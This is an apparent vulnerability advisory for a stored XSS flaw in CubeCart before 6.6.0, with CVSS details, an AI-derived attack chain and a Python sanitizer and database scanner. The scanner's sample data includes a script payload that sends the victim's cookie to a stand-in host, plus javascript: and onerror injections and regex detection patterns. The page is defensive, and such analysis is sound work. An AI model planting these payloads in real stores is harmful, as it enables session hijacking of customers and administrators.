CubeCart CVE-2026-39428

EUVD-2026-30157 · MEDIUM
Cross-site Scripting (XSS) (CWE-79)
Published 2026-05-13 · CNA: GitHub_M
CVSS 3.1 base score 4.8 · GitHub Advisory
Severity by source

GitHub Advisory PRIMARY
4.8 MEDIUM
AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Lifecycle Timeline

Analysis generated: Jun 08, 2026 - 11:05 (vuln.today)
Patch available: May 13, 2026 - 22:03 (EUVD)

Description (GitHub Advisory)

CubeCart is an ecommerce software solution. Prior to 6.6.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in CubeCart v6.x. An attacker with administrative privileges can inject malicious JavaScript payloads into multiple fields during the creation or modification of a product. These payloads are stored in the database and executed whenever a user (customer or another administrator) views the affected product pages, which could lead to session hijacking or unauthorized actions. This vulnerability is fixed in 6.6.0.

Analysis (AI)

Stored Cross-Site Scripting in CubeCart v6.x (prior to 6.6.0) allows an authenticated administrator to inject persistent malicious JavaScript into product creation or modification fields, which then executes in the browsers of any user - customer or fellow administrator - who views the affected product pages. The attack requires high-privilege access (PR:H) and victim interaction (UI:R), limiting its realistic threat surface to compromised or malicious admin accounts. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Obtain or compromise CubeCart admin credentials
Delivery: Log into the admin panel
Exploit: Inject a JavaScript payload into product fields
Install: Payload is stored in the database
C2: Victim loads the affected product page; the store itself serves the stored payload, so no separate command channel is needed
Execute: Malicious script executes in the victim's browser
Impact: Exfiltrate the session cookie or perform unauthorized actions as the victim

Vulnerability Assessment (AI)

Exploitation: Exploitation requires that the attacker already holds a CubeCart administrative account with product creation or modification privileges (CVSS PR:H). …
Risk Assessment: The overall risk is moderate-to-low in practice despite the network-accessible attack vector, because the precondition is an administrative account. …
Exploit Scenario: An attacker who has obtained CubeCart administrative credentials, whether through credential theft, phishing, or a compromised admin account, navigates to the product management interface and injects a JavaScript payload (e.g., a cookie-stealing script) into a product's name, description, or another stored field. When a customer browses the product page, or another administrator views it in the admin panel, the script executes in their browser. If the session cookie is readable by script it can be exfiltrated to an attacker-controlled server for session hijacking; if the cookie carries the HttpOnly flag, the script can instead issue authenticated requests from the victim's browser (for example, changing settings or creating accounts when the victim is an administrator), so HttpOnly limits the cookie-theft variant but not the impact. …
Remediation: The vendor-released patch is CubeCart 6.6.0, which resolves this vulnerability. … Because the payloads are persisted in the database, pair the upgrade with a review of product records created or modified before it, and, where admin compromise is suspected, reset admin credentials and invalidate active sessions.
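The two sides of the scenario and remediation above, as an added illustration for this advisory rather than CubeCart's own code: plain-text product fields (name, SKU) must be HTML-escaped on output, fields that legitimately carry HTML (the description) need an allowlist sanitizer rather than escaping, and records stored before the upgrade should be hunted for payloads. The row layout (`product_id`, `name`, `description`) and the function names are assumptions for the example, not CubeCart's schema or API, and the sample rows are constructed.

```python
"""Output handling for stored product fields, plus a scan for records that
already carry a payload. Added illustration for this advisory, not CubeCart's
own code; the row layout (product_id, name, description) is an assumption."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_SCHEMES = {"http", "https", ""}  # "" covers relative URLs


class AllowlistSanitizer(HTMLParser):
    """Rebuild a description from an allowlist: unknown tags, every on*
    handler and non-http(s) hrefs are dropped, text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open, self.skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1  # drops the element and its text content
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = (value or "").strip()
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href" and urlparse(value).scheme not in SAFE_SCHEMES:
                continue  # javascript:, data:, vbscript: ...
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag != "br":
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in self.open:
            while self.open:  # also closes tags left open inside this one
                closed = self.open.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))

    def result(self):
        self.close()
        while self.open:  # close anything the input left dangling
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize_html(value):
    """For fields that legitimately carry HTML, e.g. the product description."""
    parser = AllowlistSanitizer()
    parser.feed(value)
    return parser.result()


def escape_text(value):
    """For plain-text fields (name, SKU, meta title): escape, never render raw."""
    return html.escape(value, quote=True)


# Hunting markers for rows stored before the upgrade. Deliberately broad; an
# obfuscated payload can still slip past a regex, so a clean scan is a first pass.
TAG_IN_TEXT = re.compile(r"<[a-zA-Z/!]")
PAYLOAD_MARKERS = re.compile(
    r"<\s*script|<\s*iframe|\bon[a-z]+\s*=|javascript\s*:|srcdoc\s*=", re.I)


def scan_products(rows, rich_fields=("description",)):
    """Return (product_id, field) pairs whose stored value looks injected:
    any tag in a plain-text field, payload markers in a rich-text field."""
    findings = []
    for row in rows:
        for field, value in row.items():
            if field == "product_id" or not isinstance(value, str):
                continue
            pattern = PAYLOAD_MARKERS if field in rich_fields else TAG_IN_TEXT
            if pattern.search(value):
                findings.append((row["product_id"], field))
    return findings


# Constructed sample rows, not real store data; 102 and 103 carry payloads.
SAMPLE_ROWS = [
    {"product_id": 101, "name": "Blue Widget",
     "description": "<p>Solid <b>brass</b> widget.</p>"},
    {"product_id": 102,
     "name": 'Red Widget<script>new Image().src="https://c2.invalid/?c="+document.cookie</script>',
     "description": "<p>Plain description.</p>"},
    {"product_id": 103, "name": "Green Widget",
     "description": '<p>See <a href="javascript:alert(1)">details</a></p><img src=x onerror="alert(1)">'},
]
```

Running `scan_products(SAMPLE_ROWS)` flags the name of product 102 and the description of product 103; `sanitize_html` on that description yields `<p>See <a>details</a></p>` (the `javascript:` href and the `<img onerror>` are gone), while `escape_text` on the 102 name turns the `<script>` tag into inert text. The sanitizer is allowlist-based on purpose: a denylist of "bad" tags is what stored XSS in rich-text fields usually slips past.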


CVE-2026-39428 vulnerability details – vuln.today